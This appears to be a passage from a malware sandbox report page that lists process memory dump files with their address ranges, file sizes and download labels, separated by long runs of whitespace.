                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/6804-12863-0x00000000009F0000-0x0000000000D14000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/7864-21137-0x000001D552EF0000-0x000001D552F12000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-27024-0x0000000005BC0000-0x00000000061D8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-27026-0x0000000005510000-0x000000000554C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-32755-0x0000000006DB0000-0x0000000006E42000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-32696-0x0000000006C90000-0x0000000006D06000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-32689-0x00000000071C0000-0x00000000076EC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-32679-0x0000000006AC0000-0x0000000006C82000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-27199-0x00000000057C0000-0x00000000058CA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-26970-0x0000000000B70000-0x0000000000B8E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-27084-0x00000000055A0000-0x00000000055EC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-32761-0x0000000006F90000-0x0000000006FAE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/8428-27025-0x00000000054B0000-0x00000000054C2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/10980-61415-0x00000000008F0000-0x0000000000A42000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/10980-61828-0x0000000005CF0000-0x0000000005E12000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/10980-61829-0x00000000037F0000-0x00000000037F8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/10980-61895-0x00000000008F0000-0x0000000000A42000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/10980-53642-0x00000000008F0000-0x0000000000A42000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/13912-62729-0x000001371F360000-0x000001371F38C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Download
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              OSZAR »